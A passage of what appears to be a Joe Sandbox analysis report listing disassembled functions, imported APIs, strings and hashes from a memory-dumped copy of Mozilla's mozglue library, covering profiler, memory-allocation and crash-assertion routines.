                                                                  • Instruction ID: 26623e33d428d1de23076e9eb8a7092053ef7e326f3cd6bc33a37e5b18b6e371
                                                                  • Opcode Fuzzy Hash: 7107396dcefeaf75a855aaf160fa465836da585b7a25b7b7df6d8c4e6f6f02c2
                                                                  • Instruction Fuzzy Hash: B921E175600615AFDB109F28EC24A9A377AFB5636DF108215F92CD7B81DB31D8078BB1
                                                                  APIs
                                                                    • Part of subcall function 6C9BEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9BEB83
                                                                  • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C9FB392,?,?,00000001), ref: 6C9F91F4
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                  • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                  • API String ID: 3790164461-3347204862
                                                                  • Opcode ID: e9ca04bf070f6bf3809864f02ef28d6680a1dee73664edc99c4ac12f0474c4f6
                                                                  • Instruction ID: 8c0d160bdf50506f7ddd8ac828b8395858a447931aaf41b20edd46d5f9d3bbcc
                                                                  • Opcode Fuzzy Hash: e9ca04bf070f6bf3809864f02ef28d6680a1dee73664edc99c4ac12f0474c4f6
                                                                  • Instruction Fuzzy Hash: E4B1C3B0B012199BDB04CF99C891BEEBBB9BF95308F144029D516ABF80D735D986CBD1
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9DC5A3
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C9DC9EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C9DC9FB
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9DCA12
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9DCA2E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9DCAA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                  • String ID: (null)$0
                                                                  • API String ID: 4074790623-38302674
                                                                  • Opcode ID: 32642c50d352c3dfbef96bfadb052a467e40a3eb74eeaa5460cdcf8fabd2a7da
                                                                  • Instruction ID: f25218fda092ab2047dd0469528c6d30cf1dc11db2fbf6eb84f209031380999f
                                                                  • Opcode Fuzzy Hash: 32642c50d352c3dfbef96bfadb052a467e40a3eb74eeaa5460cdcf8fabd2a7da
                                                                  • Instruction Fuzzy Hash: 2AA1DF31608B529FDB10DF28C98475ABBF5AF89748F06C91CE88AE3741D735E805CB92
                                                                  APIs
                                                                  • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9DC784
                                                                  • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9DC801
                                                                  • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C9DC83D
                                                                  • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9DC891
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                  • String ID: INF$NAN$inf$nan
                                                                  • API String ID: 1991403756-4166689840
                                                                  • Opcode ID: 094803d8fa262665c6f935e985288528e73d1f460a7108d716cc9cf4a3f79c36
                                                                  • Instruction ID: 69f3decff7f550f182def03cabbecfe75deb82b3f52adb82a5ce54e257ed3f29
                                                                  • Opcode Fuzzy Hash: 094803d8fa262665c6f935e985288528e73d1f460a7108d716cc9cf4a3f79c36
                                                                  • Instruction Fuzzy Hash: CD51A571908B808BD704DF6CC58169AFBF4BF9A308F018A1CF9D5A7650E774E985CB42
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$moz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3009372454-0
                                                                  • Opcode ID: 50053bd2b8c79c92cfa3bbaae7324377a943e104bee518b5e6697ee8765ebdcc
                                                                  • Instruction ID: 2275d9547fd6bf2f9e449641f2694a7d795d7382345ad1c24091a4b129721701
                                                                  • Opcode Fuzzy Hash: 50053bd2b8c79c92cfa3bbaae7324377a943e104bee518b5e6697ee8765ebdcc
                                                                  • Instruction Fuzzy Hash: 26B1F271A00512AFDB189F2CC8D476E77A6AF52328F18466DE816FBB86D730D840DF91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                  • String ID:
                                                                  • API String ID: 1192971331-0
                                                                  • Opcode ID: a3cd779285a7c5abc8ce3bf710bd229b58d222d123f12e451eb3ae787600288a
                                                                  • Instruction ID: 2732d0d45780b0c15e298151a2d4d7e0c450756c07b20030de7e342f0db3d4ab
                                                                  • Opcode Fuzzy Hash: a3cd779285a7c5abc8ce3bf710bd229b58d222d123f12e451eb3ae787600288a
                                                                  • Instruction Fuzzy Hash: 733197B1904B058FDB04AF7DD94826EBBF1FF85305F118A2DE889C7251EB749489CB82
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C9C9675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C9697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9C96E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C9C9707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9773
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9C97B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C9C97D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C9C97EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 409848716-3880535382
                                                                  • Opcode ID: 29b6224faf99d87667ec0e519b6b89c6cc3f68f1da7cea1bcdd868d2da36e845
                                                                  • Instruction ID: 8b1413c11accf566b326a7660486d42c007894b854672463b9600d49dcd4c35d
                                                                  • Opcode Fuzzy Hash: 29b6224faf99d87667ec0e519b6b89c6cc3f68f1da7cea1bcdd868d2da36e845
                                                                  • Instruction Fuzzy Hash: 5F418E717003069BDF14DFA5ECA9A967BB4FB49718F118169ED09C7780E730E816CBA2
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1EC1
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1EE1
                                                                  • EnterCriticalSection.KERNEL32(6CA3E744), ref: 6C9B1F38
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E744), ref: 6C9B1F5C
                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C9B1F83
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1FC0
                                                                  • EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1FE2
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9B1FF6
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9B2019
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 2055633661-2608361144
                                                                  • Opcode ID: 252900ec4981bfe619e45a32bd8ccf39f9ce98fb5e9c47b51d5c29bfb0fa968a
                                                                  • Instruction ID: 343cbf750817b97b598040db43cc2f566b4df8a974d4c3f37408686e16db85ae
                                                                  • Opcode Fuzzy Hash: 252900ec4981bfe619e45a32bd8ccf39f9ce98fb5e9c47b51d5c29bfb0fa968a
                                                                  • Instruction Fuzzy Hash: 5141DE71B0431A9BDB149FA8DCA9B6B3AB5EF5A308F144125F908E7780DB71D805CBD1
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA00039
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA00041
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA00075
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6CA00082
                                                                  • moz_xmalloc.MOZGLUE(00000048), ref: 6CA00090
                                                                  • free.MOZGLUE(?), ref: 6CA00104
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6CA0011B
                                                                  Strings
                                                                  • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6CA0005B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                  • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                  • API String ID: 3012294017-637075127
                                                                  • Opcode ID: 1f40163adcccfae3c84c24ed247419d5a84a7e420045ae6b2ba4e6abbebabb9b
                                                                  • Instruction ID: 487696dd91a307650701032d84f65fd12cd43d821bc904b952d0557aa5eb4382
                                                                  • Opcode Fuzzy Hash: 1f40163adcccfae3c84c24ed247419d5a84a7e420045ae6b2ba4e6abbebabb9b
                                                                  • Instruction Fuzzy Hash: 7141CDB16017559FCB20CF28DC50A9ABBB1FF69358F04851EE99A83B41D731E846CBA1
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9C7EA7
                                                                  • malloc.MOZGLUE(00000001), ref: 6C9C7EB3
                                                                    • Part of subcall function 6C9CCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C9CCB49
                                                                    • Part of subcall function 6C9CCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C9CCBB6
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C9C7EC4
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C9C7F19
                                                                  • malloc.MOZGLUE(?), ref: 6C9C7F36
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9C7F4D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                  • String ID: d
                                                                  • API String ID: 204725295-2564639436
                                                                  • Opcode ID: 94d88c6bad60358e40222348e8f786f42a3023082c094de824070c8cf59a6e1e
                                                                  • Instruction ID: 1edf1b3d0eb6099af6f4c2e855bce89edff132a65aaeb0929ae74fc0a6f987a2
                                                                  • Opcode Fuzzy Hash: 94d88c6bad60358e40222348e8f786f42a3023082c094de824070c8cf59a6e1e
                                                                  • Instruction Fuzzy Hash: B9313B71E0039997EB019B38CC545FEB778EFA6208F049628DC4997612FB34E9C9C392
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C9C3EEE
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C3FDC
                                                                  • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C9C4006
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C40A1
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C40AF
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C40C2
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C4134
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C4143
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C9C3CCC), ref: 6C9C4157
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Free$Heap$StringUnicode$Allocate
                                                                  • String ID:
                                                                  • API String ID: 3680524765-0
                                                                  • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction ID: 78eb46c401877f3fbcd881a9c89643c4d523099261aa7b6d063aecba47ff3ac6
                                                                  • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction Fuzzy Hash: F0A190B1B40215CFEB40CF28C980669B7B5FF48308F294599D909AF742D771E986CFA2
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,6C9D3F47,?,?,?,6C9D3F47,6C9D1A70,?), ref: 6C9B207F
                                                                  • memset.VCRUNTIME140(?,000000E5,6C9D3F47,?,6C9D3F47,6C9D1A70,?), ref: 6C9B20DD
                                                                  • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C9D3F47,6C9D1A70,?), ref: 6C9B211A
                                                                  • EnterCriticalSection.KERNEL32(6CA3E744,?,6C9D3F47,6C9D1A70,?), ref: 6C9B2145
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C9D3F47,6C9D1A70,?), ref: 6C9B21BA
                                                                  • EnterCriticalSection.KERNEL32(6CA3E744,?,6C9D3F47,6C9D1A70,?), ref: 6C9B21E0
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E744,?,6C9D3F47,6C9D1A70,?), ref: 6C9B2232
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                  • API String ID: 889484744-884734703
                                                                  • Opcode ID: ae623f899f9510e59c49c3c08686705e03c162dc1e1fce300ece13b6a44edb1e
                                                                  • Instruction ID: 4c19a8e971812510d51b3cf18433e3454ff357634df40a68299280a64d1605d5
                                                                  • Opcode Fuzzy Hash: ae623f899f9510e59c49c3c08686705e03c162dc1e1fce300ece13b6a44edb1e
                                                                  • Instruction Fuzzy Hash: 1861B231F00A169FCB18CA68CC99B6E76B5EF95318F294239E928F7A94D770DD01C781
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C9F483A,?), ref: 6C9B4ACB
                                                                  • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C9F483A,?), ref: 6C9B4AE0
                                                                  • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C9F483A,?), ref: 6C9B4A82
                                                                    • Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2
                                                                  • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C9F483A,?), ref: 6C9B4A97
                                                                  • moz_xmalloc.MOZGLUE(15D4E801,?,6C9F483A,?), ref: 6C9B4A35
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C9F483A,?), ref: 6C9B4A4A
                                                                  • moz_xmalloc.MOZGLUE(15D4E824,?,6C9F483A,?), ref: 6C9B4AF4
                                                                  • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C9F483A,?), ref: 6C9B4B10
                                                                  • moz_xmalloc.MOZGLUE(8E8E0022,?,6C9F483A,?), ref: 6C9B4B2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                  • String ID:
                                                                  • API String ID: 4251373892-0
                                                                  • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                  • Instruction ID: a440eac14169c15a5d8f70f8c117632ce79525fb1e11c2eeff28e7d6c0d40f4e
                                                                  • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                  • Instruction Fuzzy Hash: A57149B1A007069FCB54CF68C480AAAB7F5FF18308B104A3EE15ADBB41E731E655DB81
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA08273), ref: 6CA09D65
                                                                  • free.MOZGLUE(6CA08273,?), ref: 6CA09D7C
                                                                  • free.MOZGLUE(?,?), ref: 6CA09D92
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CA09E0F
                                                                  • free.MOZGLUE(6CA0946B,?,?), ref: 6CA09E24
                                                                  • free.MOZGLUE(?,?,?), ref: 6CA09E3A
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CA09EC8
                                                                  • free.MOZGLUE(6CA0946B,?,?,?), ref: 6CA09EDF
                                                                  • free.MOZGLUE(?,?,?,?), ref: 6CA09EF5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID:
                                                                  • API String ID: 956590011-0
                                                                  • Opcode ID: 2309ab9b70df78e0751edd626d0231467b3b3f902375ef43b03f4ca60099a621
                                                                  • Instruction ID: 26ac8dced9b943aa65e20933548fe09efc263660387dc44b55917907dbe08524
                                                                  • Opcode Fuzzy Hash: 2309ab9b70df78e0751edd626d0231467b3b3f902375ef43b03f4ca60099a621
                                                                  • Instruction Fuzzy Hash: 7571AEB0A09B419BD712CF28D58055BF3F4FFA9319B448619E89A5BB01EB30F8C5CB91
                                                                  APIs
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CA0DDCF
                                                                    • Part of subcall function 6C9EFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9EFA4B
                                                                    • Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA090FF
                                                                    • Part of subcall function 6CA090E0: free.MOZGLUE(?,00000000,?,?,6CA0DEDB), ref: 6CA09108
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DE0D
                                                                  • free.MOZGLUE(00000000), ref: 6CA0DE41
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DE5F
